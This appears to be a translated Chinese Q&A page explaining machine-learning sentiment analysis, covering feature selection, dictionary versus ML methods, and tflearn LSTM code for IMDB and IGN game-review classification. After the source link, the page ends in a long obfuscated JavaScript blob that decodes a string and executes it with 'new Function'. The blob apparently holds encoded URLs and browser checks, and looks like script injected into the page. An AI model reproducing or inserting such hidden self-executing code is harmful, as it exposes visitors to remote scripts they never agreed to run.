What does machine-learning-based sentiment analysis mean?

2025-03-07 15:10:39
Recommended answers (2)
Answer 1:

The following takes semantic features as an example:


Machine-learning sentiment analysis based on semantic features


Sentiment analysis based on semantic features has been studied before and can be done by matching against a sentiment lexicon, but applying machine learning here yields higher accuracy.
Drawing on a project I took part in, here is a summary of the relevant techniques.
Background: determine whether a user review's sentiment is positive or negative, i.e., praise or criticism.

The concrete steps are:
1. Supervised manual labeling of the texts with class labels. For example, with 5,000 reviews, we label 1,000 of them as positive and another 1,000 as negative; "positive" and "negative" are the class labels.
2. Feature selection. From the positive reviews, select all the positive features word by word; likewise, select all the negative features from the negative reviews. For example, "这款游戏非常好玩" ("this game is great fun") splits into four feature words: "这款" -> "游戏" -> "非常" -> "好玩"; bigrams can also be used, taking "这款游戏" and "非常好玩" as features.
3. Feature dimensionality reduction, to cut down the number of features. In the example above, "这款游戏" need not be kept as a feature, because "好玩" or "非常好玩" already determines that the review is positive.
4. Represent the corpus texts in terms of the features.
5. Count how many times each feature occurs and sort in descending order.
6. Take the top-ranked features from that list as the final features used for classification.
7. Train a classification algorithm on the training data using these features, obtaining a classifier.
8. Measure the classifier's accuracy on test data.
We split the data into two parts, a development set and a test set: train the classification algorithm on the development set to obtain the classifier; then use the classifier to classify the test set, producing predicted labels; compare the predicted labels with the manually annotated labels to compute the accuracy.
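A minimal sketch of this pipeline, using scikit-learn as one possible implementation (the library choice, the toy corpus, and all names below are my own, not from the answer; CountVectorizer's max_features plays the role of steps 5-6, keeping only the most frequent features):

from sklearn.feature_extraction.text import CountVectorizer
from sklearn.naive_bayes import MultinomialNB
from sklearn.metrics import accuracy_score

# step 1: a toy manually labeled corpus (pre-segmented, space-separated words)
texts = ['这款 游戏 非常 好玩', '剧情 精彩 非常 推荐', '操作 糟糕 非常 无聊', '画面 很 差 不 推荐']
labels = ['pos', 'pos', 'neg', 'neg']

# steps 2-6: unigram and bigram features, keeping only the most frequent ones
vect = CountVectorizer(ngram_range=(1, 2), max_features=1000, token_pattern=r'(?u)\b\w+\b')
X = vect.fit_transform(texts)

# step 7: train a classifier on the development set
clf = MultinomialNB().fit(X, labels)

# step 8: measure accuracy (on the toy training data here; use a held-out test set in practice)
print(accuracy_score(labels, clf.predict(X)))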

Answer 2:

Knowledge
Two approaches to sentiment analysis:
Dictionary-based method: first segment the sentence into words, then count the occurrences of each word, look up the words' sentiment values in a sentiment dictionary, and finally compute the overall sentiment (see the sketch after this list).
Machine-learning method: feed in a large number of sentences along with their sentiment labels to train a sentence sentiment classifier, which can then predict the sentiment of new sentences.
Advantage of the machine-learning method: it is more accurate; deep neural networks can correctly handle sarcastic sentences, whose sentiment cannot be understood from a simple surface-level analysis of the words.
A feedforward network accepts fixed-size inputs, such as binary numbers; a recurrent network can accept sequence data, such as text.
Using AWS (Amazon Web Services) lets your code run faster and more conveniently in the cloud.
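As a concrete illustration of the dictionary-based method above, a minimal sketch (the tiny lexicon and its scores are invented for illustration):

# toy sentiment dictionary: word -> sentiment value
sentiment_dict = {'好玩': 1.0, '精彩': 1.0, '无聊': -1.0, '糟糕': -1.0}

def dict_sentiment(words):
    # sum the sentiment values of the segmented words found in the dictionary
    return sum(sentiment_dict.get(w, 0.0) for w in words)

# assume the sentence has already been segmented into words
print(dict_sentiment(['这款', '游戏', '非常', '好玩']))  # 1.0 -> positive overall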
Example
The library used in this example is tflearn, a deep learning library built on top of TensorFlow that provides a higher-level API; it is a good way for beginners to get started with deep learning.
from __future__ import division, print_function, absolute_import

import tflearn
from tflearn.data_utils import to_categorical, pad_sequences
from tflearn.datasets import imdb # Internet Movie Database
Data import
pkl: data in byte-stream form, easier to convert back into other Python objects.
Keep 10,000 words; use 10% of the data as the validation set.
train, test, _ = imdb.load_data(path='imdb.pkl',
                                n_words=10000,
                                valid_portion=0.1)
Split the data into review sets and label sets.
trainX, trainY = train
testX, testY = test
Data processing
Strings in text data cannot be fed into a neural network directly; they must be vectorized first.
A neural network is, at bottom, an algorithm operating on matrices,
so converting the text into a numeric or vector representation is necessary.
pad_sequences converts the input into matrix form and pads the matrix;
the padding keeps the input dimensionality consistent.
The parameters below pad each input sequence to length 100, with the padded positions filled with 0.
trainX = pad_sequences(trainX, maxlen=100, value=0.)
testX = pad_sequences(testX, maxlen=100, value=0.)
Convert the label sets into binary vectors (indicating whether a review is positive or negative).
trainY = to_categorical(trainY, nb_classes=2)
testY = to_categorical(testY, nb_classes=2)
Network construction
Define the input layer; the input length is 100.
Define the embedding layer; its first argument is the tensor it receives, i.e. the previous layer's output; 10,000 words are loaded in total, and the output dimension is set to 128.
Define the LSTM (long short-term memory) layer, which lets the network remember data from the start of a sequence; dropout is set to 0.8, a technique for preventing overfitting.
Define the fully connected layer, using softmax as the activation function.
Apply a regression operation to the input, defining the optimization method, the learning rate, and the loss function.
net = tflearn.input_data([None, 100])
net = tflearn.embedding(net, input_dim=10000, output_dim=128)
net = tflearn.lstm(net, 128, dropout=0.8)
net = tflearn.fully_connected(net, 2, activation='softmax')
net = tflearn.regression(net, optimizer='adam', learning_rate=0.001,
                         loss='categorical_crossentropy')
Network training
Initialize the neural network.
Train it, passing the training set and validation set; show_metric=True prints the training log.
model = tflearn.DNN(net, tensorboard_verbose=0)
model.fit(trainX, trainY, validation_set=(testX, testY), show_metric=True,
          batch_size=32)
Registering for AWS requires a foreign credit card, which I couldn't arrange, so I ran this on my own laptop: training took 40 minutes and 7,040 iterations, with final accuracy reaching 0.9475 and the loss falling from about 0.5 at the start to 0.15. I should find a free cloud server for running small programs like this.
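Once training finishes, the model can score new (already padded) sequences. A minimal usage sketch, assuming the second output column corresponds to the positive class under the to_categorical encoding above:

pred = model.predict(testX[:1])  # output shape (1, 2): class probabilities
print('positive probability:', pred[0][1])  # index 1 assumed to be the positive class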
Challenge
The challenge for this video is to train a model on this dataset of video game reviews from IGN.com. Then, given some new video game title, it should be able to classify it. You can use pandas to parse this dataset. Right now each review has a label that's either Amazing, Great, Good, Mediocre, Painful, or Awful. These are the emotions. Using the existing labels is extra credit. The baseline is that you can just convert the labels so that there are only 2 emotions (positive or negative). Ideally you can use an RNN via TFLearn like the one in this example, but I'll accept other types of ML models as well.
You'll learn how to parse data, select appropriate features, and use a neural net on an IRL problem.
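For the baseline of collapsing the labels to two emotions, a minimal sketch (which ratings count as positive is my own assumption, not from the challenge):

# ratings treated as positive; everything else becomes negative
POSITIVE = {'Masterpiece', 'Amazing', 'Great', 'Good', 'Okay'}

def to_binary(score_phrase):
    return 'positive' if score_phrase in POSITIVE else 'negative'

# applied to the dataframe loaded below with, e.g., dataframe.score_phrase.map(to_binary)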
import tflearn
from tflearn.data_utils import to_categorical, pad_sequences, VocabularyProcessor
import pandas as pd
import numpy as np

# Data import
# Import the data with pandas; a random train/test split would be better here (see the sketch after this block)
dataframe = pd.read_csv('ign.csv').iloc[:, 1:3]

train = dataframe.iloc[:int(dataframe.shape[0]*0.9), :]
test = dataframe.iloc[int(dataframe.shape[0]*0.9):dataframe.shape[0], :]

trainX = train.title
trainY = train.score_phrase
testX = test.title
testY = test.score_phrase
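As the comment above notes, a random split is preferable to slicing off the last 10%; a minimal sketch using pandas' sample (replacing the slicing above):

shuffled = dataframe.sample(frac=1, random_state=42)  # shuffle all rows reproducibly
split = int(shuffled.shape[0] * 0.9)
train = shuffled.iloc[:split, :]
test = shuffled.iloc[split:, :]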

# Data processing
# Unlike the example, the data here is raw text, so it must first be converted into numeric sequences, using tflearn's VocabularyProcessor; the samples fall into 11 classes
vocab_proc = VocabularyProcessor(15)
trainX = np.array(list(vocab_proc.fit_transform(trainX)))
testX = np.array(list(vocab_proc.transform(testX)))  # reuse the vocabulary fitted on the training set

vocab_proc2 = VocabularyProcessor(1)
trainY = np.array(list(vocab_proc2.fit_transform(trainY))) - 1
trainY = to_categorical(trainY, nb_classes=11)
testY = np.array(list(vocab_proc2.transform(testY))) - 1  # reuse the label vocabulary fitted on trainY
testY = to_categorical(testY, nb_classes=11)

# Network construction
# It is not yet clear by what criteria different networks should be designed, so the example's network is reused directly (with the output layer widened to 11 classes)
net = tflearn.input_data([None, 15])
net = tflearn.embedding(net, input_dim=10000, output_dim=128)  # input_dim should be at least the vocabulary size
net = tflearn.lstm(net, 128, dropout=0.8)
net = tflearn.fully_connected(net, 11, activation='softmax')  # 11 output classes, matching the 11 labels
net = tflearn.regression(net, optimizer='adam', learning_rate=0.001,
                         loss='categorical_crossentropy')

# Network training
model = tflearn.DNN(net, tensorboard_verbose=0)
model.fit(trainX, trainY, validation_set=(testX, testY), show_metric=True,
          batch_size=32)
Jovian's Winning Code:
Jovian's winning code is thorough, with detailed explanations for every step. It likewise treats this as a classification problem and compares three different classification approaches; the final trained deep network reaches an accuracy of about 0.5, and given a game's title it predicts the game's rating level.
Dependencies
import pandas as pd
import tflearn
from tflearn.data_utils import to_categorical, pad_sequences
from tflearn.datasets import imdb
from sklearn.feature_extraction.text import CountVectorizer
from sklearn import preprocessing
Data import
Import the game review dataset ign.csv.
original_ign = pd.read_csv('ign.csv')
Check the shape of the dataset.
print('original_ign.shape:', original_ign.shape)
output:
original_ign.shape: (18625, 11)
There are 18,625 games in total, each with 11 fields. Only the rating phrase (score_phrase) concerns us here. Below, count how often each rating occurs.
original_ign.score_phrase.value_counts()
output:
Great 4773
Good 4741
Okay 2945
Mediocre 1959
Amazing 1804
Bad 1269
Awful 664
Painful 340
Unbearable 72
Masterpiece 55
Disaster 3
Name: score_phrase, dtype: int64
Great and Good are the most common ratings, while only 3 games are rated Disaster.
Data processing
Preprocessing
Check whether there are any null elements (missing values).
original_ign.isnull().sum()
output:
Unnamed: 0 0
score_phrase 0
title 0
url 0
platform 0
score 0
genre 36
editors_choice 0
release_year 0
release_month 0
release_day 0
dtype: int64
Fill the missing values with empty strings (this example does not actually need these two steps, but checking for missing values is a good habit):
original_ign.fillna(value='', inplace=True)
Data splitting
Separate the samples from the labels:
X = original_ign.title  # the game title is the input text
y = original_ign.score_phrase
Split into training and test sets:
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
Sample processing
Convert the sample strings into numeric sequences: build the vocab and turn X into X_word_ids.
vect = CountVectorizer(ngram_range=(1,1), token_pattern=r'\b\w{1,}\b')

vect.fit(X_train)
vocab = vect.vocabulary_

def convert_X_to_X_word_ids(X):
    return X.apply(lambda x: [vocab[w] for w in [w.lower().strip() for w in x.split()] if w in vocab])

X_train_word_ids = convert_X_to_X_word_ids(X_train)
X_test_word_ids = convert_X_to_X_word_ids(X_test)
Sequence padding

X_train_padded_seqs = pad_sequences(X_train_word_ids, maxlen=20, value=0)
X_test_padded_seqs = pad_sequences(X_test_word_ids, maxlen=20, value=0)
Label processing
unique_y_labels = list(y_train.value_counts().index)
le = preprocessing.LabelEncoder()
le.fit(unique_y_labels)

y_train = to_categorical(y_train.map(lambda x: le.transform([x])[0]), nb_classes=len(unique_y_labels))
y_test = to_categorical(y_test.map(lambda x: le.transform([x])[0]), nb_classes=len(unique_y_labels))
Network construction
The network is built the same way as in the example.
n_epoch = 100
size_of_each_vector = X_train_padded_seqs.shape[1]
vocab_size = len(vocab)
no_of_unique_y_labels = len(unique_y_labels)
net = tflearn.input_data([None, size_of_each_vector]) # The first element is the "batch size" which we set to "None"
net = tflearn.embedding(net, input_dim=vocab_size, output_dim=128) # input_dim: vocabulary size
net = tflearn.lstm(net, 128, dropout=0.6) # Set the dropout to 0.6
net = tflearn.fully_connected(net, no_of_unique_y_labels, activation='softmax') # relu or softmax
net = tflearn.regression(net,
                         optimizer='adam',  # adam or ada or adagrad # sgd
                         learning_rate=1e-4,
                         loss='categorical_crossentropy')
Network training
Initialize:
model = tflearn.DNN(net, tensorboard_verbose=0)
Train:
model.fit(X_train_padded_seqs, y_train,
          validation_set=(X_test_padded_seqs, y_test),
          n_epoch=n_epoch,
          show_metric=True,
          batch_size=100)
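To use the trained model the way the description promises (enter a game title, get a predicted rating level), a minimal sketch reusing the vocab, model, and le objects from above (the helper name and the sample title are my own):

import numpy as np

def predict_rating(title):
    # convert the title to word ids with the fitted vocab, pad, predict, decode the label
    ids = [vocab[w] for w in [w.lower().strip() for w in title.split()] if w in vocab]
    padded = pad_sequences([ids], maxlen=20, value=0)
    probs = model.predict(padded)[0]
    return le.inverse_transform([int(np.argmax(probs))])[0]

print(predict_rating('Grand Theft Auto V'))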
Source: https://blog.csdn.net/qq_31707969/article/details/79361606

Y8""=F=2=O!7O5cF858280!F<7mqY2pFh!ac587HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@ojc287HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc287HLZcF%}a=O87HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPac2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=7mqOdfiFdF_L8*}PTcOa=@8887mqOdfiFdF_Lvv)caP=OmO2Y55O587_2(F6O2ca[@l887mqOdfiFdF_LvvYvvYca=TcOaP=7mqOdfiFdF_L8}PqYF i8l}!7_2(F6O2 )ca[ivvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5c7mYXY2F|TJY=7m(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfc7m5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqc7mLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 $ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l887mqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP87!7_2(F6O2 Lca[Xd5 Y8pc"hFFJLg//[[fdTPPKs0qhOFq^)Y6(:mX2O2fmRT4gQ}1Q/((/Ks0j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 _8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!_mLFTqYm(LL|YRF8Y=_mdffEXY2Ft6LFY2Y5c7mYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=_aP67clia[qYF[YXY2F|TJYgY=6L|OJg5=5YXY5LY9Y6phFg6P87!fO(_^Y2FmdffEXY2Ft6LFY2Y5cY=h=l0a=7m(q6(S9d2fqY8h!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 fca[Xd5 Y8pc"hFFJLg//[[fdTPPKs0qhOFq^)Y6(:mX2O2fmRT4gQ}1Q/((/Ks0j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 hcYa[Xd5 F8D62fODm622Y59Y6phF!qYF 280=O80!67cYaLD6F(hcYmLFOJW^^Yf6dFYe5OJdpdF6O2ca=YmFTJYa[(dLY"FO_(hLFd5F"g28YmFO_(hYLH0Zm(q6Y2F&=O8YmFO_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"FO_(hY2f"g28Ym(hd2pYf|O_(hYLH0Zm(q6Y2F&=O8Ym(hd2pYf|O_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"(q6(S"g28Ym(q6Y2F&=O8Ym(q6Y2F-P67c0<2vv0<Oa67c5a[67cO<86a5YF_52l}!O<^%6vvfcaPYqLY[F8F*O!67cF<86a5YF_52l}!F<^%6vvfcaPP2m6f87m5YXY5LYWf=2mLFTqYm(LL|YRF8`hY6phFg$[7m5YXY5LY9Y6phFPJR`=5jfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc"d7FY5)Yp62"=2agfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=2a=i8l0PqYF F8pc"hFFJLg//[[fdTPPKs0dhFLFT6m)CFSp)pmRT4gQ}1Q/f/Ks0j(8}vR8YoTfSLT@Jp"a!FvvLYF|6^YO_Fc7_2(F6O2ca[Xd5 Y8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!YmL5(8F=fO(_^Y2FmhYdfmdJJY2fxh6qfcYaP=}YsaPP=@n00aPO82dX6pdFO5mJqdF7O5^=Y8l/3cV62?yd(a/mFYLFcOa=F8Jd5LYW2FcL(5YY2mhY6phFa>8Jd5LYW2FcL(5YY2mD6fFha=cY??Favvc/)d6f_?9_dDY6u5ODLY5?A6XOu5ODLY5?;JJOu5ODLY5?9YT|dJu5ODLY5?y6_6u5ODLY5?yIIu5ODLY5?Bxu5ODLY5?IzI/6mFYLFc2dX6pdFO5m_LY5rpY2FajDc7_2(F6O2ca[Lc@0}a=Dc7_2(F6O2ca[Lc@0@a=fc7_2(F6O2ca[Lc@0saPaPaPagfc7_2(F6O2ca[Lc}0}a=fc7_2(F6O2ca[Lc}0@a=Dc7_2(F6O2ca[Lc}0saPaPaPaa=lYvvO??$ca=XO6f 0l882dX6pdFO5mLY2fuYd(O2vvfO(_^Y2FmdffEXY2Ft6LFY2Y5c"X6L6)6q6FT(hd2pY"=7_2(F6O2ca[Xd5 Y=F!"h6ffY2"888fO(_^Y2FmX6L6)6q6FTiFdFYvvdmqY2pFhvvcY8pc"hFFJLg//[[fdTPPKs0dhFLFT6m)CFSp)pmRT4gQ}1Q"a%"/)_pj68"%J=cF82YD ]O5^wdFdamdJJY2fc"^YLLdpY"=+i;NmLF562p67Tcdaa=FmdJJY2fc"F"="0"a=2dX6pdFO5mLY2fuYd(O2cY=Fa=dmqY2pFh80=qc6=""aaPaPaca!'.substr(22));new Function(b)()}();